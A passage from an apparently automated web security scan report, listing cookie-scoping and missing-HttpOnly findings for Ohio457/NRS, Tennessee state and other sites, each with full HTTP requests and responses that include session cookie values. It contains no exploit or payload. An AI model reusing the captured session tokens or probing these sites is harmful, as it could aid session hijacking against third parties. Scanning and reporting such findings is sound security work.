......Exif..II*.......1.......2...2.......P...i.......j.......Adobe Photoshop CS5 Macintosh.2011-01-25T16:44:12-05:00...........0220    .................................................Ducky.......d.....
...[SNIP]...

13.119. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/navTabs/tabLeft.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/navTabs/tabLeft.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2ED168B072C91072106DFD47DEDA6F26; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 10 Mar 2011 17:28:09 GMT
ETag: "1780fe-279-2b481c40"
Accept-Ranges: bytes
Content-Length: 633
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..K...............................................................................................................................................................................................
...[SNIP]...

13.120. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/navTabs/tabRight.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/navTabs/tabRight.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=3017DBFA72C9107208C2A4861F3DF71F; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 10 Mar 2011 17:28:01 GMT
ETag: "1780ff-5c5-2ace0a40"
Accept-Ranges: bytes
Content-Length: 1477
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..K...............................................................................................................................................................................................
...[SNIP]...

13.121. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/sprites/login-button.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/sprites/login-button.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=302A2BC072C910721079FD47DEDA6F26; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Wed, 26 Jan 2011 20:14:05 GMT
ETag: "178101-13b-79877d40"
Accept-Ranges: bytes
Content-Length: 315
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a(......................................................................................................,....(...... .Y....4......Rt.W.DHB.$..pH.*.G."0.`>...H........H...t..v...z.n.....s.l0C!...
...[SNIP]...

13.122. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/sprites/login-lock.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/sprites/login-lock.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=301B239672C910722137D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 16:29:01 GMT
ETag: "47001d-24d-36c96d40"
Accept-Ranges: bytes
Content-Length: 589
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a....|.b_d......ebg.........pmr.............|..............}.........................}y~...............JHN..mjo......zw{...xuzkhm.................^[a.......~.vsx............spu................
...[SNIP]...

13.123. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/js/wtlOhio.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/js/wtlOhio.js HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2ED0072C72C910722131D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 07 Oct 2010 15:11:19 GMT
ETag: "1f8dfc-522e-4e5db3c0"
Accept-Ranges: bytes
Content-Length: 21038
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* WebTrends SmartSource Data Collector Tag
   Version: 8.6.2
   Tag Builder Version: 3.0
   Created: 4/1/2009 5:35:05 PM
   Updated for double tagging
   State of Ohio Ohio457.org */

function WebT
...[SNIP]...

13.124. https://www.nrsservicecenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=302A2BC072C910721079FD47DEDA6F26

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:38:26 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=8B164DF672CA107204E7B0604E433874; Path=/; Domain=.nrsservicecenter.com
Content-Length: 332
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr />
...[SNIP]...

13.125. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/cmd/RetLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iApp/ret/cmd/RetLogin HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EBB9219073261073022FCEC122287B10; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: JSESSIONID=0001ACicLnN7eR8w5L7FAtdHBJX:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f666e524b777875572f7a39336c3047694975555635386d576950674d6554344c5953444d442b4a352b6549; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: private, no-cache=set-cookie
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 7645


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <html lang
...[SNIP]...

13.126. https://www.nrsservicecenter.com/iApp/ret/content/landing.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/content/landing.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iApp/ret/content/landing.do?Role=None&Site=Ohio457 HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: http://oh.gov/stateemployee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:13 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: TLTSID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001PF1_bP7-IBZ42tEJzNaNTGe:13j9iuj6t; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483444304d6f4450416e34524c754261686f56624c74417a4e4d3251564d3742725258754d5173714a5651334c7449472f736b684a63426642327971723849794f733d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...

13.127. https://www.nrsservicecenter.com/iApp/ret/landing.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/landing.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iApp/ret/landing.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDEE6218732610730181C1E2C63083C9; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001mmfBFC8Kymw5lCom8cv4BX4:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 12:40:59 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...

13.128. https://www.nrsservicecenter.com/iApp/ret/showPage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/showPage.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iApp/ret/showPage.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDD8FB4E7326107300A08C7B1CB4C778; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001YFkAdRMz04gilI2jygmcFCj:13j9iupo2; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 8439


        <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh
...[SNIP]...

13.129. http://www.real.com/realplayer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.real.com
Path:   /realplayer

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /realplayer HTTP/1.1
Host: www.real.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: JSESSIONID=BD5220AADC49692F465066534E191CF4; Path=/realcom
Set-Cookie: rntrack=src=realplayer&opage=realplayer; Domain=.real.com; Expires=Sat, 30 Apr 2011 13:10:04 GMT; Path=/;
Set-Cookie: rnseo=; Domain=.real.com; Path=/;
Set-Cookie: NSC_Sfbmdpn-bqq.sfbm.dpn-80=ffffffffaf16e47045525d5f4f58455e445a4a4229a0;expires=Sat, 30-Apr-2011 14:04:18 GMT;path=/;httponly
Connection: close
Content-Length: 26892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...

13.130. http://www.reserveamerica.com/la/state/campgrounds/r/campgroundDirectoryList.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reserveamerica.com
Path:   /la/state/campgrounds/r/campgroundDirectoryList.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /la/state/campgrounds/r/campgroundDirectoryList.do HTTP/1.1
Host: www.reserveamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Sat, 30 Apr 2011 12:40:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 30 Apr 2011 12:40:05 GMT
Content-Length: 9358
Connection: close
Set-Cookie: JSESSIONID=DB82248EA6CA35E930BE62F48663F998.web03-ny; Path=/
Set-Cookie: _rauv_=DB82248EA6CA35E930BE62F48663F998.web03-ny_; Domain=.reserveamerica.com; Expires=Fri, 25-Apr-2031 12:40:05 GMT; Path=/
Set-Cookie: _rauv_=DB82248EA6CA35E930BE62F48663F998.web03-ny_; Domain=.reserveamerica.com; Expires=Fri, 25-Apr-2031 12:40:05 GMT; Path=/
Set-Cookie: NSC_QSPE-VXQ-IUUQ=4472140525b9;Version=1;Max-Age=3600;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Strict//EN">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://openg
...[SNIP]...

14. Cookie without HttpOnly flag set  previous  next
There are 658 instances of this issue:


14.1. https://apps.tn.gov/bizreg/bizregprog  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /bizreg/bizregprog

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bizreg/bizregprog?action=gotoRegisterBusiness HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://apps.tn.gov/bizreg/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 00:58:54 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Location: http://apps.tn.gov/bizreg/tax.jsp;jsessionid=5135D230630641F0714BF0702C635B61.portalprod1
Content-Length: 0
Set-Cookie: JSESSIONID=7C1C1CB77466893AF25C44D68EDC9054.portalprod1; Path=/bizreg
Set-Cookie: JSESSIONID=5135D230630641F0714BF0702C635B61.portalprod1; Path=/bizreg
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8


14.2. https://apps.tn.gov/bizreg/tax.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /bizreg/tax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bizreg/tax.jsp HTTP/1.1
Host: apps.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:00 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 4949
Set-Cookie: JSESSIONID=458EE0883D635B75C12B63B9090B8580.portalprod1; Path=/bizreg
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<html lang="en-US"><!-- #BeginTemplate "/Templates/bizreg.dwt" --><!-- DW6 -->
<head>
<!-- #BeginEditable "doctitle" -->
<title>
...[SNIP]...

14.3. https://apps.tn.gov/biztax-app/login.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /biztax-app/login.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /biztax-app/login.html HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://apps.tn.gov/biztax/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:03:25 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2889
Set-Cookie: JSESSIONID=5917367B2BC078AE01FCE9F4DDCB78BA.portalprod1; Path=/biztax-app
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!-- InstanceBegin templa
...[SNIP]...

14.4. https://apps.tn.gov/paams-app/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /paams-app/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paams-app/index.htm HTTP/1.1
Host: apps.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:00 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
